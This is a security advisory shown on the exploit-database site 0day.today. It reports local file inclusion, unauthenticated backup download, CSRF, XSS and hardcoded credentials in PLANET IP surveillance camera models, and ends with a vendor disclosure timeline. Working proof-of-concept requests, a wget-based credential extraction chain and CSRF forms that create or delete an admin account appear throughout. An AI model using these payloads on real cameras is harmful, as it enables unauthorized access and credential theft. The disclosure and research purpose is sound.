0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

PLANET Technology IP Surveillance Cameras - Multiple Vulnerabilities

Author

Orwelllabs

Risk

[

Security Risk High

]

0day-ID

Category

Date add

Platform

Overview
========
Technical Risk: high
Likelihood of Exploitation: medium
Credits: Discovered and researched by Orwelllabs
CVE-Number: N/A
DWF: Submited
Adivisory URL:
http://www.orwelllabs.com/2016/02/planet-ip-surveillance-camera-local.html
[1]
 
 
Issues
=====
I.   Local File Inclusion (42 vectors)
II.  Arbitrary file read/Authentication bypass
III. Sensitive information disclosure
IV.  Cross-site request forgery
V.   Reflected Cross-site scripting
VI.  hardcoded credentials
 
 
I. Local File Inclusion
=======================
* CLASS: External Control of File Name or Path [CWE-73]
 
The Web Management interface of PLANET IP surveillance Cams models
FW-ICA-2500,
ICA-2250VT, ICA-4200V, ICA-4500V, ICA-3350V, ICA-5350V AND ICA-8350 and
probably
others is prone to Local File Include (LFI).
 
 
PoC
---
The request bellow is generated when a new user is added, in this case
we are adding the following administrative credential for the cam:
"root:r00tx".
 
GET /cgi-bin/admin/querylogin.cgi HTTP/1.1
Host: {xxx.xxx.xxx.xxx}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:42.0) Gecko/20100101
Firefox/42.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://
{xxx.xxx.xxx.xxx}/cgi-bin/admin/usrgrp.cgi?user=root&pwd=r00tx&grp=administrator&sgrp=ptz&action=add&redirect=asp%2Fuser.asp
Cookie: ipcam_profile=1; tour_index=-1; IsHideStreamingStatus=yes
Authorization: Basic YdRRtXW41YXRtad4=
Connection: keep-alive
If-Modified-Since: Mon, 08 Jul 2013 11:10:26 GMT
 
 
If the value of the parameter "redirect" was changed to any system file
will return the contents of that file, as shown below:
http://
{xxx.xxx.xxx.xxx}/cgi-bin/admin/usrgrp.cgi?user=root&pwd=r00tx&grp=administrator&sgrp=ptz&action=add&redirect=/etc/passwd
 
In this case will retrieved the content of /etc/passwd
 
Vectors:
-------
There are a total of 42 vectors of LFI, the detailed results will be
published in www.orwelllabs.com [1] soon.
Basically all menus of the camera (shown below) to submit, add, modify and
remove settings trigger the corresponding
scripts to access resource that contains a parameter "redirect" which is
also affected.
 
[ ----------------------------]
[ #1:  Network ---------------] -> 9
[ #2:  Camera  ---------------] -> 3
[ #3:  System  -------------- ] -> 2
[ #4:  Video   -------------- ] -> 4
[ #5:  Audio   -------------- ] -> 1
[ #6:  User    -------------- ] -> 1
[ #7:  Protocol ------------- ] -> 2
[ #8:  E-Mail  -------------- ] -> 1
[ #9:  Event Detection ------ ] -> 1
[ #10: Storage -------------- ] -> 2
[ #11: Continuous Recording - ] -> 1
[ #12: Recording List ------- ] -> 0
[ #13: Event Server --------- ] -> 11
[ #14: Event Schedule ------- ] -> 4
[ ----------+---------------  ]
 
 
 
II. Arbitrary file read/Authentication bypass
=============================================
The camera offers a feature to perform the download settings via a backup
file. However,
(how acess control is not effective) this file remains accessible via the
browser for an unauthenticated user.
 
PoC
---
wget --no-check-certificate https://{xxx.xxx.xxx.xxx}/backup.tar.gz
tar -xzvf backup.tar.gz
cat tmp/sysConfig/sysenv.cfg|strings|fmt|cut -f8,9 -d" "
 
It will return the credential to access the camera
 
Through this vulnerability a user can also obtain the credential of the AP
to which the camera is connected just parsing
the file: 'tmp/sysConfig/extra.info'
 
 
III. Sensitive information disclosure
=====================================
Using LFI vulnerability report, a user can obtain sensitive information
such as username and password by reading the log file, as follows:
 
{xxx.xxx.xxx.xxx}/cgi-bin/admin/usrgrp.cgi?user=&pwd=&grp=&sgrp=&action=&redirect=/var/log/messages
 
 
IV. Cross-site request forgery
==============================
Planet IP cams ICA-* are prone to Multple CSRF.
 
PoC
------
 
- This will create a admin credential: root:r00tx
 
<html>
<!-- CSRF PoC - -->
<body>
<form action="http://
{xxx.xxx.xxx.xxx}/setup.cgi?language=ie&adduser=root:r00tx:1">
<input type="submit" value="Submit form" />
</form>
</body>
</html>
 
- ICA-5350V
 
<html>
<!-- CSRF PoC -->
<body>
<form action="http://
{xxx.xxx.xxx.xxx}/cgi-bin/admin/usrgrp.cgi?user=root&pwd=r00tx&grp=administrator&sgrp=ptz&action=add&redirect=asp%2Fuser.asp">
<input type="submit" value="Submit form" />
</form>
</body>
</html>
 
- Del user root
 
<html>
<!-- CSRF PoC -->
<body>
<form action="http://
{xxx.xxx.xxx.xxx}/cgi-bin/admin/usrgrp.cgi?user=root&pwd=r00tx&grp=administrator&sgrp=ptz&action=remove&redirect=asp%2Fuser.asp">
<input type="submit" value="Submit form" />
</form>
</body>
</html>
 
 
V. Cross-Site Scripting
=======================
Cams models ICA-* are prone to Multiple XSS
 
POC
-------
http://{xxx.xxx.xxx.xxx}/setup.cgi?<script>alert("XSS")</script>
 
this will pop-up the message XSS in the browser
 
 
VI. hardcoded credentials
=========================
 
The credentials of web management can be found just viewing the source of
page default_nets.htm:
 
POC
------
https://{xxx.xxx.xxx.xxx}/default_nets.htm
 
code:
 
}
 
function av_onload(){
CheckMobileMode();
util_SetUserInfo();
Loadplay();
watchdog();
//alert("watchdog");
}
function Loadplay(){
play("MasterUsr","MasterPwd","554",parseInt("99"),parseInt("99"),"1",parseInt("2"),parseInt("0"),"192.168.1.99","");
}
 
 
Vulnerable Packages
===================
ICA-2500
ICA-2250VT
ICA-4200V
ICA-4500V
ICA-3350V
ICA-5350V
ICA-8350
 
 
 
Timeline
========
2015-10-02 - Issues discovered
2015-11-30 - Vendor contacted (advisore sent)
2015-12-16 - Vendor contacted (asking for feedback about reported issues)
2015-12-17 - Vendor response (asking for more time to check issues)
2015-12-21 - RD team replied: can't duplicate vulnerabilities....
2016-01-13 - Vendor contacted (submitted evidence that the vulnerabilities
persist and can be reproduced.)
...and no news after that...

#  0day.today [2024-12-26]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

PLANET Technology IP Surveillance Cameras - Multiple Vulnerabilities

Report Error

Report Error